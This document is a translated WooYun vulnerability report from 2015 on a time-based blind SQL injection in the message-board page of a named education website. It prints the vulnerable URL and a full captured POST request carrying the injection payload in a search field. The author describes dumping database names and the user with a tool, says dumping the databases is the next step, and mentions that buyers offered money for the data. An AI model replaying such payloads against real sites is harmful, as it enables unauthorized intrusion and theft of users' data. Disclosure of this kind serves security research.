
Vulnerability Summary

Defect ID: wooyun-2015-093253

Title: SQL injection in StudyEZ学习网 (StudyEZ learning site)

Vendor: StudyEZ学习网

Author: XXXQQ

Submitted: 2015-01-22 14:43

Fix deadline: 2015-03-08 14:44

Published: 2015-03-08 14:44

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-01-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-03-08: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The home page of the consultation center has a POST-based blind SQL injection; data can be pulled out.

Detailed description:

This site holds a very considerable amount of data; people have offered a high price for the data and for access.
I confirmed a time-based blind injection by hand, then ran a tool against it directly.
The database names and the user name have already been dumped. Time-based blind injection is very slow; it took several hours to get them out.

[Screenshot: 1.png]


The captured request is shown below; manual testing confirmed a time-delay blind injection.
POST injection URL: http://www.studyez.com/leaveword/default.aspx

POST /leaveword/default.aspx?page=9 HTTP/1.1
Content-Length: 9385
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.studyez.com:80/leaveWord/Default.aspx
Cookie: .EZANONYMOUS=KRSwNIUu0AEkAAAANGFkMzI1ZDgtZDdmYi00NWFkLWE1YjMtMDJkZDVmODkxNDA00
Host: www.studyez.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AspNetPagerAll=go&AspNetPagerAll_input=9&btnSearch=&btnToSubmit=&txtKeyWord=22');%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWBAKTwfPmCgLrvY/%2bBALeipm1AwKln/PuCromQaT6FaO3loeYC38mVHb0I/nT&__VIEWSTATE=/wEPDwUKLTc1ODc0NDk5Mw9kFgICAw9kFhACBQ8WBB4LXyFJdGVtQ291bnQCCB4HVmlzaWJsZWcWEGYPZBYCZg8VAxhTaG93TGVhdmVXb3JkLmFzcHg/SUQ9MTBF5oKo5aW977yB5oiR5Lus55qE5byA6K%2b%2b5LuY5qy%2b5pa55byP5pyJ5Yeg56eN77yf6YO95oCO5LmI5pSv5LuY5ZGi77yfJ%2baCqOWlve%2b8geaIkeS7rOeahOW8gOivvuS7mOasvuaWueW8j%2baciWQCAQ9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0zOR7or77nqIvop4bpopHlj6/lkKbkuIvovb3kuIvmnaUe6K%2b%2b56iL6KeG6aKR5Y%2bv5ZCm5LiL6L295LiL5p2lZAICD2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTIwaeekvuS8muW3peS9nOiAheiAg%2bivleaYr%2bS7gOS5iOaXtuWAmeaKpeWQje%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8n%2b%2b8nyfnpL7kvJrlt6XkvZzogIXogIPor5XmmK/ku4DkuYjml7blgJnmiqVkAgMPZBYCZg8VAxdTaG93TGVhdmVXb3JkLmFzcHg/SUQ9MxjlrabkuaDljaHlpoLkvZXlhYXlgLzvvJ8Y5a2m5Lmg5Y2h5aaC5L2V5YWF5YC877yfZAIED2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTE3SOS9oOWlve%2b8jOaIkeaDs%2befpemBkyAyMDEy5bm055uR55CG6ICD6K%2bVIOWVpeaXtuWAmeaKpeWQje%2b8n%2baIkeWMl%2bS6rOeahB3kvaDlpb3vvIzmiJHmg7Pnn6XpgZMgMjAxMuW5tGQCBQ9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0zMTPljJfkuqzmlZnluIjotYTmoLzogIPor5XmiqXlkI3ku4DkuYjml7blgJnlvIDlp4vvvJ8n5YyX5Lqs5pWZ5biI6LWE5qC86ICD6K%2bV5oql5ZCN5LuA5LmI5pe2ZAIGD2QWAmYPFQMYU2hvd0xlYXZlV29yZC5hc3B4P0lEPTE2LjIwMTHlubTkvJrorqHogYznp7DogIPor5XmiqXlkI3mnaHku7bmnInlk6rkupsfMjAxMeW5tOS8muiuoeiBjOensOiAg%2bivleaKpeWQjWQCBw9kFgJmDxUDGFNob3dMZWF2ZVdvcmQuYXNweD9JRD0yNIgBMjAxMuW5tOeOr%2bWig%2bW9seWTjeivhOS7t%2bW4iOeahOi%2bheWvvO%2b8jOeOsOWcqOWPr%2bS7peaKpeWQjeS6huWQl%2bOAguS6pOi/h%2bS4gOasoeWPguWKoOWfueiureeahOi0ueeUqO%2b8jOS7peWQjui/mOeUqOS6pOWFtuWug%2bi0ueeUqOWQl%2bOAgh8yMDEy5bm0546v5aKD5b2x5ZON6K%2bE5Lu35biI55qEZAIHDxYCHgRUZXh0ZWQCDQ8WAh8AAg4WHGYPZBYCZg8VAwIyNAbljLvlraYG5Yy75a2mZAIBD2QWAmYPFQMCMzAG5bel56iLBuW3p
eeoi2QCAg9kFgJmDxUDAjI5Bui0ouS8mgbotKLkvJpkAgMPZBYCZg8VAwIyOAblpJbotLgG5aSW6LS4ZAIED2QWAmYPFQMCMjYM5Y%2b45rOV6ICD6K%2bVDOWPuOazleiAg%2bivlWQCBQ9kFgJmDxUDAjE0CeWFrOWKoeWRmAnlhazliqHlkZhkAgYPZBYCZg8VAwIxNQblpJbor60G5aSW6K%2btZAIHD2QWAmYPFQMCMjUG6ICD56CUBuiAg%2beglGQCCA9kFgJmDxUDAzIzMQzmiJDkurrpq5jogIMM5oiQ5Lq66auY6ICDZAIJD2QWAmYPFQMCMjMM5a2m5piT6Z2i5o6IDOWtpuaYk%2bmdouaOiGQCCg9kFgJmDxUDAjE5BuiBjOS4mgbogYzkuJpkAgsPZBYCZg8VAwQxNDMzFeS4gOe6p%2bazqOWGjOiuoemHj%2bW4iBXkuIDnuqfms6jlhozorqHph4/luIhkAgwPZBYCZg8VAwM4NDMM5pWZ5biI6LWE5qC8DOaVmeW4iOi1hOagvGQCDQ9kFgJmDxUDAzgyMBLkvJjmg6DmtLvliqjkuJPpopgS5LyY5oOg5rS75Yqo5LiT6aKYZAIRDxYEHwACDx8BZxYeZg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzk2SeeOsOWcqOmDvTnmnIjkuK3ml6zkuobvvIznu4/mtY7luIjnsr7orrLnj63nmoTor77ku7bku4DkuYjml7blgJnmm7TmlrDvvJ9J546w5Zyo6YO9OeaciOS4reaXrOS6hu%2b8jOe7j%2ba1juW4iOeyvuiusuePreeahOivvuS7tuS7gOS5iOaXtuWAmeabtOaWsO%2b8nwQxMDI4CzA5LTEwIDE3OjIzKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPg/lrabmmJPlrablkZgyMTJkAgEPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM5NRLlpoLkvZXkuIvovb3or77ku7YS5aaC5L2V5LiL6L296K%2b%2b5Lu2BDExNjgLMDktMTAgMTc6MTEqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bDG5hbmF0dXR1MjAwOWQCAg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzg3SOS4uuS7gOS5iOaIkeW3sue7j%2bW8gOmAmuivvueoi%2b%2b8jOi/m%2bWFpeWQrOivvu%2b8jOWNtOaSreaUvuS4jeWHuuadpeWRou%2b8n0jkuLrku4DkuYjmiJHlt7Lnu4/lvIDpgJror77nqIvvvIzov5vlhaXlkKzor77vvIzljbTmkq3mlL7kuI3lh7rmnaXlkaLvvJ8EMTA0MwswOS0xMCAxNDoxMio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Hd2VpMTIxMmQCAw9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzg0ReaZrumAmuS6uuWRmOaAjuS5iOiDvea7oei2s%2bWPguWKoOW/g%2beQhuWSqOivouW4iOeahOiAg%2bivleimgeaxguWRou%2b8n0Xmma7pgJrkurrlkZjmgI7kuYjog73mu6HotrPlj4LliqDlv4PnkIblkqjor6LluIjnmoTogIPor5XopoHmsYLlkaLvvJ8EMTA5OQswOS0xMCAxMDowNio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4NcHNpbGxAMTI2LmNvbWQCBA9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzc4xAHpgKDku7cg55qE5oqA5pyv5LiO6K6h6YeP5omN6K6y5Yiw56ys5LqM56u
g77yM6L%2bZ6KaB5Yiw5LuA5LmI5pe25YCZ5omN6IO95LiK5Lyg5a6M5ZWK77yM6L%2bY5LiA5Liq5pyI5bCx6ICD6K%2bV5LqG44CC6L%2bY5pyJ5YW25LuW56eR55qE5Lmg6aKY6Kej5p6Q54%2bt5Lmf5rKh5byA5aeL5ZGi77yM5YeG5aSH5LuA5LmI5pe25YCZ5byA5aeL5ZGi77yfcOmAoOS7tyDnmoTmioDmnK/kuI7orqHph4/miY3orrLliLDnrKzkuoznq6DvvIzov5nopoHliLDku4DkuYjml7blgJnmiY3og73kuIrkvKDlrozllYrvvIzov5jkuIDkuKrmnIjlsLHogIPor5XkuoYEMTI2NAswOS0wOSAyMTozMio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Hc3hoMjAxM2QCBQ9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03Mzc3duaIkeecn%2beahOS4jeaYjueZveS6hizkuLrku4DkuYjml6for77nqIvmiJHlnKjljZXkvY3lsLHog73mlL7lh7rmnaUs6ICM6auY5riF55qE5Y%2bN5pS%2b5LiN5Ye65p2l5LqGLui2iuaUuei2iuiQveWQjuWQlz9s5oiR55yf55qE5LiN5piO55m95LqGLOS4uuS7gOS5iOaXp%2bivvueoi%2baIkeWcqOWNleS9jeWwseiDveaUvuWHuuadpSzogIzpq5jmuIXnmoTlj43mlL7kuI3lh7rmnaXkuoYu6LaK5pS56LaKAzkyMAswOS0wOSAyMDo1NSo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4Jd2pqODgxOTMzZAIGD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNzPrA%2b%2b8iOS4gO%2b8ieaIkeaYqOWkqeS4iuWtpuaYk%2be9ke%2b8jOi/m%2bWFpeWHuueJiOS4k%2bS4mueQhuiuuuS4juWunuWKoe%2b8iOS4ree6p%2b%2b8ieeyvuiusuePree9kemhte%2b8jOaJk%2bW8gOaWsOWinueahOesrDE06K6y44CK5Lmm5YiK5b2i5oCB6K6%2b6K6h44CL77yM6KeB5pyJMS0xNOiusuiusuS5ieS%2bm%2bS4i%2bi9ve%2b8jOS9huaIkeaJk%2bWNsOWQjuWPkeeOsOivpeiusuS5ieacgOWQjuS4gOiusuS4uuesrDE16K6y77yM5L2G5YW25Lit57y656ysN%2bOAgTjjgIE544CBMTHlm5vorrLvvIzmnJvlrabmmJPnvZHlsL3ml6nooaXlhajjgIINCg0K77yI5LqM77yJ5pyA6L%2bR55yL55CG6K665LiO5a6e5Yqh77yI5Lit57qn77yJ57K%2b6K6y54%2bt6KeG6aKR77yM5Y%2bR546w572R6aG15LiK5omA5qCH5rOo55qE6K%2b%2b56iL5qyh5bqP5LiOUFBU6YeM5omA5qCH5rOo55qE6K%2b%2b56iL5qyh5bqP5LiN57uf5LiA44CC5pyA5aW96IO957uf5LiA6LW35p2l77yM5Lul5pa55L6/5a2m5ZGY44CCcu%2b8iOS4gO%2b8ieaIkeaYqOWkqeS4iuWtpuaYk%2be9ke%2b8jOi/m%2bWFpeWHuueJiOS4k%2bS4mueQhuiuuuS4juWunuWKoe%2b8iOS4ree6p%2b%2b8ieeyvuiusuePree9kemhte%2b8jOaJk%2bW8gOaWsOWinueahOesrAQxMTQxCzA5LTA5IDE2OjIwKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPgzmspnmvKDnlJjms4lkAgcPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM2N
z/lh7rniYjkuJPkuJrotYTmoLzmlZnmnZDmlrDniYjor77ku7bnnIvkuI3liLDop4bpopHvvIzmgI7kuYjlip4/5Ye654mI5LiT5Lia6LWE5qC85pWZ5p2Q5paw54mI6K%2b%2b5Lu255yL5LiN5Yiw6KeG6aKR77yM5oCO5LmI5YqeBDExMzkLMDktMDggMjA6MzUqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bEHpzX25qa2pAc29odS5jb21kAggPZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzM2MzzkuIDlu7rlhazot6/lrp7liqHnmoTkuaDpopjnj63or77nqIvmgI7kuYjmsqHmnInkuIrkvKDlkaLvvJ885LiA5bu65YWs6Lev5a6e5Yqh55qE5Lmg6aKY54%2bt6K%2b%2b56iL5oCO5LmI5rKh5pyJ5LiK5Lyg5ZGi77yfAzk1NQswOS0wOCAxNjo1OCo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4MemhhbmdndW9waW5nZAIJD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNjJ45Li65LuA5LmI5Lit57qn5Lya6K6h6IGM56ew6ICD6K%2bV5L%2bd6L%2bH54%2bt55qE6K%2b%2b56iL5LiK5Lyg55qE5aaC5q2k5oWi77yM5bey57uP5b6I5b%2br5bCx6KaB6ICD6K%2bV5LqG77yM6K%2b35bC95b%2br5LiK5Lyg44CCcuS4uuS7gOS5iOS4ree6p%2bS8muiuoeiBjOensOiAg%2bivleS/nei/h%2bePreeahOivvueoi%2bS4iuS8oOeahOWmguatpOaFou%2b8jOW3sue7j%2bW%2biOW/q%2bWwseimgeiAg%2bivleS6hu%2b8jOivt%2bWwveW/q%2bS4igM5NjYLMDktMDggMTY6MTAqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bEjM0MjQwMTE5NjgwODEzMTAyNmQCCg9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03MzU4J%2baIkeimgeaYr%2bWQrOivvueahOivne%2b8jOW6lOivpeaAjuS5iOWQrCfmiJHopoHmmK/lkKzor77nmoTor53vvIzlupTor6XmgI7kuYjlkKwEMTA1MQswOS0wOCAxMTo1OCo8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4J6JGj57Ky54S2ZAILD2QWAmYPFQcaU2hvd0xlYXZld29yZC5hc3B4P0lEPTczNTJv5bu66K6%2b5bel56iL6YCg5Lu3566h55CG6L%2bZ6Zeo6K%2b%2b57K%2b6K6y54%2bt5aW95LmF6YO95rKh5pyJ5paw55qE6K%2b%2b5Lu25LiK5Lyg77yM6Zq%2b6YGT6KaB562J5Yiw6ICD6K%2bV5pe25omN5pyJ77yfb%2bW7uuiuvuW3peeoi%2bmAoOS7t%2beuoeeQhui/memXqOivvueyvuiusuePreWlveS5hemDveayoeacieaWsOeahOivvuS7tuS4iuS8oO%2b8jOmavumBk%2bimgeetieWIsOiAg%2bivleaXtuaJjeacie%2b8nwM5NjcLMDktMDcgMjA6MjcqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bCWxpeW9uZ190eWQCDA9kFgJmDxUHGlNob3dMZWF2ZXdvcmQuYXNweD9JRD03MzQ0Y%2bivpeiAg%2bivleS6hu%2b8jOS4uuS7gOS5iOmrmOWuoeePreWuoeiuoeeQhuiuuuS4juahiOS%2bi%2bS4iuS8oOmCo%2bS5iOaFo
u%2b8jOWwseS4jeiDveS4iuS8oOW/q%2beCueWQl%2b%2b8n2Por6XogIPor5XkuobvvIzkuLrku4DkuYjpq5jlrqHnj63lrqHorqHnkIborrrkuI7moYjkvovkuIrkvKDpgqPkuYjmhaLvvIzlsLHkuI3og73kuIrkvKDlv6vngrnlkJfvvJ8DOTEyCzA5LTA3IDE1OjUxKjxzcGFuIGNsYXNzPSdDbG9zZWRTdGF0ZSc%2b5bey562U5aSNPC9zcGFuPhjljYPph4zkuYvooYzlp4vkuo7otrPkuItkAg0PZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzMzOD/ku4rlubTnu5/orqHku47kuJrlhoXpg6jotYTmlpnnmoTnrZTmoYjvvIzmgI7kuYjmsqHmnInop6PmnpDvvJ8/5LuK5bm057uf6K6h5LuO5Lia5YaF6YOo6LWE5paZ55qE562U5qGI77yM5oCO5LmI5rKh5pyJ6Kej5p6Q77yfAzg4NwswOS0wNyAxMDowNio8c3BhbiBjbGFzcz0nQ2xvc2VkU3RhdGUnPuW3suetlOWkjTwvc3Bhbj4IY21mNjcxMThkAg4PZBYCZg8VBxpTaG93TGVhdmV3b3JkLmFzcHg/SUQ9NzMyNIwBMjAxMuW5tOe7n%2biuoeWfuuehgOW3peefpeivhuS4jue7n%2biuoeWunuWKoeOAguWGhemDqOi1hOaWmemHjOacgOWQjuS4gOmBk%2bmimOebrueahOacgOWQjuS4gOmBk%2bWwj%2bmimOebrueahOetlOahiOS4uuS7gOS5iOaYr0PvvIzogIzkuI3mmK/vvJ9qMjAxMuW5tOe7n%2biuoeWfuuehgOW3peefpeivhuS4jue7n%2biuoeWunuWKoeOAguWGhemDqOi1hOaWmemHjOacgOWQjuS4gOmBk%2bmimOebrueahOacgOWQjuS4gOmBk%2bWwj%2bmimOebrueahAM5ODILMDktMDYgMTQ6MjAqPHNwYW4gY2xhc3M9J0Nsb3NlZFN0YXRlJz7lt7LnrZTlpI08L3NwYW4%2bCGNtZjY3MTE4ZAITDw8WBB4QQ3VycmVudFBhZ2VJbmRleAIJHgtSZWNvcmRjb3VudAKqCWRkAhUPFgIfAmVkAhkPDxYEHwMCAR8EZmRkAhsPFgIfAgUqPHRyPjx0ZD7mmoLml6Dmu6HotrPmnaHku7bmlbDmja48L3RkPjwvdHI%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULYnRuVG9TdWJtaXQFCWJ0blNlYXJjaHrAzJrk9C%2bUdlBP4M%2b/%2bAHupQGU


The tool dumped the database names and the user. Screenshots below; they speak for themselves.

[Screenshot: 2.png]

[Screenshot: 3.png]

[Screenshot: 4.png]

Proof of vulnerability:

The database names are all out; the next step is simply to dump the databases.

[Screenshot: 5.png]

Fix recommendation:

Please fix it yourselves.

Copyright notice: credit the source when reposting: XXXQQ@乌云 (WooYun)


Vendor Response

Vendor reply:

The vendor could not be contacted, or the vendor actively declined the report.